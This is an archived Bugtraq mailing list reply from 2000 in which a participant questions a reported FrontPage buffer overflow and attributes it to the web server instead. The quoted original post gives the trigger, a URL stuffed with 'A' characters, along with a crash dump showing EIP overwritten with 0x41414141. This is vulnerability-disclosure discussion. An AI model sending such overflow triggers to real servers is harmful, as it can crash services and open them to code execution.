Bugtraq mailing list archives
Re: More vulnerabilities in FP
From: ddoc () MIA CZ (Daniel Dočekal)
Date: Mon, 24 Apr 2000 20:39:12 +0200
That's hardly overflow in FP, VHTTPD32 does not seem to be part of WindowsNT and more hardly of Frontpage (could be some old version of course), what operating system are you using? This seems to be overflow in HTTP (Web Server, PWS or IIS) and for WIndowsNT it was handled long time ago in some postfix and service packs. It would be good idea to include complete information about the system you are testing, otherwise it is useless. Daniel
-----Original Message----- From: Roman [mailto:webmad () MAIL RU] Sent: Saturday, April 22, 2000 10:16 PM To: BUGTRAQ () SECURITYFOCUS COM Subject: Re: More vulnerabilities in FP Hello,First remote FrontPage exploit?How about this one: <A HREF="http://server/AAAAAAAAAAAA<a">http://server/AAAAAAAAAAAA<a</A> lots of A>AAAAAA FP will overflow and someone will see this message: VHTTPD32 caused an invalid page fault in module <unknown> at 0000:41414141. Registers: EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212 EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141 ECX=00fe52c4 DS=016f ESI=00fe7744 FS=3647 EDX=bffc9490 ES=016f EDI=bff94645 GS=0000 Bytes at CS:EIP: Stack dump: 41414141 41414141 66204141 656c6961 6f662064 32312072 2e302e37 2c312e30 61657220 3a6e6f73 6c696620 6f642065 6e207365 6520746f 74736978 00000000 Tested on FP 3.0.2.926. Maybe others?
Current thread:
- Re: More vulnerabilities in FP .sozni (Apr 20)
- <Possible follow-ups>
- Re: More vulnerabilities in FP Thomas Dullien (Apr 21)
- Re: More vulnerabilities in FP Roman (Apr 22)
- Re: More vulnerabilities in FP Daniel Dočekal (Apr 24)
- Re: More vulnerabilities in FP Ian McDonald (Apr 26)
- ISS Security Advisory: Insecure file handling in IBM frcactrl program Aleph One (Apr 26)